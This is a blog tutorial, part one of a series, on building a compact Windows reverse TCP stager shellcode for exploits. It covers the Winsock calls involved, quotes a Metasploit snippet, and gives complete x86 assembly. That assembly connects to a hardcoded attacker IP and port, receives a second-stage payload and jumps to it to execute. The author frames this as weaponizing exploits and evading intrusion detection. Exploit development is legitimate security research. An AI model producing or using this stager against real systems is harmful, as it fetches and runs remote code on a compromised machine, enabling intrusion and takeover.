Developing a Custom Windows Reverse TCP Stager Shellcode — Part One
Crashing an application is just one part of the vulnerability research and exploit development process. After root-cause analysis, what follows, is crafting an elusive exploit that is reliable and stable. It is all an art of perfection, intrinsic to weaponizing an exploit.
An essential feature of an exploit code is the size and quality of the shellcode used. They affect the efficiency and effectiveness of an exploit code. At some point, you will have to encrypt or decrypt, encode or decode, and patch your shellcode on the fly in an attempt to evade an Intrusion Detection System (IDS) or to deal with bad characters in your shellcode. Buffer size is yet another problem you have to grapple with, and in most cases, it is like trying to fit a three-seater sofa into a small car…
Contextualizing purpose of a custom shellcode
For Remote Code Execution (RCE) kind of exploits, access to the target machine is usually desirable. If the buffer where our shellcode should reside is smaller than our intended shellcode, a stager shellcode is used. The first stage shellcode will connect back to the attacker’s machine and fetch a second stage shellcode and then execute it. Ideally, a custom shellcode makes an exploit more robust against a specific target and also reduces the size of the exploit code significantly.
Occasionally, a custom shellcode will have some hardcoded memory address to some specific functions or at least a means to resolve the addresses of the needed functions at runtime. The memory addresses usually change across different Windows Service Packs and versions. In some cases, if the functions that you would need in your shellcode don’t exist in the target application that you are exploiting, you will have to load them before proceeding. Good enough, for RCE exploits, the target application is usually using some network resources and your exploit will just have to find the offset of the loaded function to reuse in your exploit code.
This article is my attempt to analyse and go through the fabrics of what makes up a reverse TCP shellcode (feel free to help me improve the steps). I’ll specifically focus on reverse stager TCP shellcode. Ideally, with the nitty-gritty of developing a network-based shellcode, you should be able to transfer the steps herein to build any related shellcode, like a Bind TCP, Connect Back TCP based shellcode (with cmd.exe STDIN stream) etc.
Reverse TCP shellcode rely on network sockets
Applications use sockets to communicate over a network or the internet. A socket enables communication between a client and server process, and it may be connection-oriented (TCP) or connectionless (UDP). Sockets interface varies slightly between operating systems. In the Windows operating system, Winsock (Windows Sockets API) defines a standard interface between a Windows TCP/IP client application and the underlying TCP/IP protocol stack.
According to MSDN, the WSASocket function creates a socket that is bound to a specific transport service provider.
SOCKET WSAAPI WSASocketA(
There is a detailed WSASocket documentation on MSDN and all the parameters for this module are well explained. In summary, af is the address family specification (there are like eight families, AF_INET is value of 2 meaning the Internet Protocol version 4 — IPv4 address family is to be used). Then there is the type parameter which infers to the type specification for the new socket (here the values are from 1 to 5 for different types, for TCP we must use SOCK_STREAM which has a value of 1). For the protocol parameter, if a value of 0 is specified, the caller does not wish to specify a protocol and the service provider will choose the protocol to use.
The lpProtocolInfo is a pointer to a WSAPROTOCOL_INFO structure that defines the characteristics of the socket to be created. We can leave it to NULL if we do not need to retrieve or store complete information for a given protocol. For the group options, if the g parameter is an existing socket group ID, join the new socket to this socket group, provided all the requirements set by this group are met. If g is not an existing socket group ID, we can use a value of 0 (no group operation is performed). Lastly, we have the dwFlags, which is a set of flags used to specify additional socket attributes; in this case, the value of WSA_FLAG_MULTIPOINT_C_ROOT (0x02) will be used.
All these parameters will be pushed on the stack in reverse order and then call the WSASocketA function.
What we are about to call — WSASocketA
At this point, we are on a roll. Although a couple of things to emphasize:
- We will need first to call WSAStartUp function if the target application has not initialised Winsock; otherwise, you can simply craft a custom shellcode that can use the socket reuse technique.
- After calling the WSASocketA function, we will need to set up a socket, initiate a connection using connect() method, use recv() method to receive the second stage shellcode and execute it.
The WSAStartUp function allows an application or DLL to specify the version of Windows Sockets required and to retrieve details of the specific Windows Sockets implementation. The target application can only issue further Windows Sockets functions after successfully calling WSAStartup.
According to the MSDN, wVersionRequired is the highest version of Windows Sockets specification that the caller can use. The high-order byte specifies the minor version number; the low-order byte specifies the major version number. On the other hand, lpWSAData is a pointer to the WSADATA data structure that is to receive details of the Windows Sockets implementation.
Now, how do we find or define the size of the WSADATA structure so we can allocate some space for it on the stack? I checked how Metasploit implements its reverse TCP shellcode and figured out how it calls WSAStartUp… After all, I guess we can not fully reinvent the wheel (smiles). Below is a snip from Metasploit’s reverse TCP shellcode block of code.
mov eax, 0x0190 ; EAX = sizeof( struct WSAData )
sub esp, eax ; alloc some space for the WSAData structure
push esp ; push a pointer to this stuct
push eax ; push the wVersionRequested parameter
push 0x006B8029 ; hash( "ws2_32.dll", "WSAStartup" )
call ebp ; WSAStartup( 0x0190, &WSAData );
A layer below the abstractions — in the memory space
Putting everything together, we should have a call to WSAStartUp and set up a new socket using WSASocketA. Having a socket, we can decide to bind to a port in the host or connect to a remote host. To use the socket created, we have to specify an IP address along with a port number.
In this case, we will receive data to a buffer immediately we connect to the attacker’s machine, then execute the data we receive.
Assuming, you are building an exploit and you have figured out pointers to WSAStartUp, WSASocketA, connect and recv you should be able to develop a handy special OS-specific shellcode. You can cut down a 380 bytes (generic reverse TCP) shellcode to about 100 bytes! Below is a summary of the operation in x86 assembly (which you can convert to a shellcode).
; Call WSAStartUp
XOR EBX,EBX ; Zero EBX
MOV BX,0x0190 ; Set lower bytes of EBX,size of WSAData struct
SUB ESP,EBX ; Create space for receiving the WSAData struct
PUSH ESP ; Save a pointer to the WSAData struct
PUSH EBX ; Push EBX as wVersionRequested
MOV EBX,[WSAStartUp] ; Save pointer to WSAStartUp in EBX
CALL EBX ; Call WSAStartUp
; Setup a new socket using WSASocketA
XOR EDI,EDI ; Set EDI to NULL
PUSH EDI ; Push dwFlags parameter value 0
PUSH EDI ; Push g parameter value 0
PUSH EDI ; Push lpProtocolInfo parameter value NULL
PUSH EDI ; Push the protocol arg value 0
INC EDI ; Increment EDI to 1
PUSH EDI ; Push the type parameter value 1
INC EDI ; Increment EDI to 2
PUSH EDI ; Push af parameter value 2
MOV EBX,[WSASocketA] ; Save pointer to WSASocketA in EBX
CALL EBX ; CALL WSASocketA
MOV EDI,EAX ; Save socket descriptor in EDI
; Initiate a connection with connect()
PUSH 0x670a882 ; Push IP address on stack
PUSH WORD 0x0653 ; Push Port address on stack
XOR EBX,EBX ; Zero EBX
ADD BL,2 ; Add 2 to BL for sin_family
PUSH WORD BX ; Push sin_port and sin_family to stack
MOV EDX,ESP ; MOV pointer for sin_port & sin_family into EDX
PUSH BYTE 16 ; Push the namelen parameter value as 0x10
PUSH EDX ; Push the the pointer to the sockaddr structure
PUSH EDI ; Push the socket descriptor
MOV EBX,[connect] ; Save pointer to connect() in EBX
CALL EBX ; CALL connect()
; Use recv() for stage 2 shellcode
INC AH ; Increment EAX to 0x0100 (connect returned 0)
INC AH ; Increment EAX to 0x1000
SUB ESP,EAX ; Create 4096 bytes buffer for the recv call
MOV EBP,ESP ; Save the pointer to the buffer in EBP
XOR ECX,ECX ; Zero ECX for use as the flags argument
PUSH ECX ; Push flags parameter value 0 (no flags)
PUSH EAX ; Push len parameter value as 4096
PUSH EBP ; Push buf parameter (pointer to output buffer)
PUSH EDI ; Push s parameter value (WSASocketA descriptor)
MOV EBX,[recv] ; Save pointer to recv()in EAX
CALL EBX ; CALL recv()
; Jump to the stage 2 shellcode and execute
JMP EBP ; Jump to the buffer that was received
When compiled, we have approximately 88 bytes of shellcode \0/ (yeah!). However, make sure to avoid null characters in your shellcode.
In part two, I’ll write out the Stager Shellcode in C/C++ then port to a full x86 assembly (while avoiding null chars).